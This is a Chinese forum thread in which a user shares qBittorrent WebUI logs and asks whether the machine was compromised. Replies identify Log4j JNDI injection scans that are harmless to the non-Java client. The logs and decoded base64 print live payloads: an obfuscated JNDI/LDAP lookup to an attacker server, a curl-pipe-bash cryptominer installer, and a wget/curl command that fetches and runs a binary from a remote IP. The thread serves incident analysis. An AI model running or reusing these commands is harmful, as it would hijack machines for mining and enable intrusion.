V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
20160409
V2EX  ›  分享发现

qbittorrent webUI 被入侵了。可否分析一下这段日志

  •  
  •   20160409 · 2023-05-09 16:08:01 +08:00 · 3449 次点击
    这是一个创建于 549 天前的主题,其中的信息可能已经有所发展或是发生改变。

    在当前最新的 Windows qbittorrent 4.5.2 版本和 4.4.5 版本都遇到了来着这个 IP 的入侵。

    对这些不太懂,唯一能做的是给日志里这段 base64 解了个码;日志末尾的 IP port 指代我的公网 IP 和 webUI 接口。

    我的电脑是已成了矿机了吗,求分析,谢谢。

    第一段 base64:curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 486xqw7y

    2023-04-26 14:36 - WebUI: 请求 Header 中 Referer 与 XFH/Host 不匹配!来源 IP: '95.214.55.244'。Referer: 't('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')'。XFH/Host: 'IP:Port'


    第二段 base64:wget http://107.172.206.114/.duck/lscpu ; curl -O http://107.172.206.114/.duck/lscpu ; chmod +x lscpu ; chmod 777 lscpu ; ./lscpu runner ; sudo ./lscpu runner ; rm -rf lscpu

    2023-05-06 20:13 - WebUI: 请求 Header 中 Referer 与 XFH/Host 不匹配!来源 IP: '95.214.55.244'。Referer: 't('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY3VybCAtTyBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY2htb2QgK3ggbHNjcHUgOyBjaG1vZCA3NzcgbHNjcHUgOyAuL2xzY3B1IHJ1bm5lciA7IHN1ZG8gLi9sc2NwdSBydW5uZXIgOyBybSAtcmYgbHNjcHU=}')'。XFH/Host: 'IP:Port'

    12 条回复    2023-05-09 19:35:05 +08:00
    leoleoleo
        1
    leoleoleo  
       2023-05-09 16:22:20 +08:00   ❤️ 1
    看日志,是尝试利用 Log4j 漏洞来给设备中上挖矿木马。是否利用成功,你需要看一下设备的资源占用,cpu 和内存是否有异常的标高,以及系统是否出现了异常的定时任务或者服务。
    0TSH60F7J2rVkg8t
        2
    0TSH60F7J2rVkg8t  
       2023-05-09 16:27:00 +08:00   ❤️ 1
    理论上这是个利用 linux 漏洞攻击的代码,如果楼主是 windows 的话,应该不会中找。
    Lentin
        3
    Lentin  
       2023-05-09 16:28:47 +08:00   ❤️ 1
    javashell
        4
    javashell  
       2023-05-09 16:49:40 +08:00   ❤️ 1
    从日志上看是 log4j 库进行 jndi 注入攻击。
    如果楼主的 qbittorrent webUI 使用的默认密码或使用的是弱密码,可以进行命令执行的(有次 ssh 配置改崩了,就是通过 qbittorrent 改回来的)
    20160409
        5
    20160409  
    OP
       2023-05-09 16:59:04 +08:00
    谢谢各位。

    @leoleoleo #1 我检查看看。一般这种是用可执行程序还是脚本之类的来挖矿?


    @javashell 就是非常常见的弱密码,我现在干脆把 webui 关了。几天前查到 qbit 大概是 4.5.1 版本时还爆出了一个漏洞,能直接绕过验证。
    javashell
        6
    javashell  
       2023-05-09 17:07:28 +08:00   ❤️ 1
    @20160409 qbittorrent 有个功能可以实现下载完成后执行指定的命令 ,叫 "Run external program on torrent completion" 可被用来进行挖矿、勒索等 ,最好是关闭 webui 访问
    20160409
        7
    20160409  
    OP
       2023-05-09 17:51:09 +08:00
    形势应该还不严峻

    > QBittorrent is C++, safe

    https://www.reddit.com/r/homelab/comments/recvfp/comment/ho78vfd/

    -------------------

    拿火绒的 Log4j2 漏洞缓解工具扫描,返回结果:

    > [Error] Get JAVA_HOME path failed ..

    JAVA_HOME 都没配置好,应该利用不起来这个漏洞?

    [3> 如果出现如下日志,则需要排查 JAVA_HOME 环境变量是否正确配置
    ----- CVE-2021-44228 漏洞缓解结果 -----
    [Error] Get JAVA_HOME path failed ..
    或者
    ----- CVE-2021-44228 漏洞缓解结果 -----
    [Error] Get Java version failed ..]

    https://bbs.huorong.cn/thread-96320-1-1.html
    7h3d4wn
        8
    7h3d4wn  
       2023-05-09 18:56:42 +08:00   ❤️ 1
    tpxcer
        9
    tpxcer  
       2023-05-09 19:04:12 +08:00 via iPhone
    怎么发现被入侵的?我现 24 小时开着,外网也直接能访问到,有点慌
    20160409
        10
    20160409  
    OP
       2023-05-09 19:14:21 +08:00
    @7h3d4wn #8 就是这个


    @tpxcer #9 软件执行日志里
    winsunz
        11
    winsunz  
       2023-05-09 19:30:28 +08:00
    吓得我赶紧关掉端口了
    webshe11
        12
    webshe11  
       2023-05-09 19:35:05 +08:00   ❤️ 1
    批量扫 Log4j CVE-2021-44228 漏洞的,qBT 的 Web 服务不是用 Java 写的,不受这个漏洞影响
    但是做好访问控制,减少攻击面总没错
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1213 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 19ms · UTC 18:13 · PVG 02:13 · LAX 10:13 · JFK 13:13
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.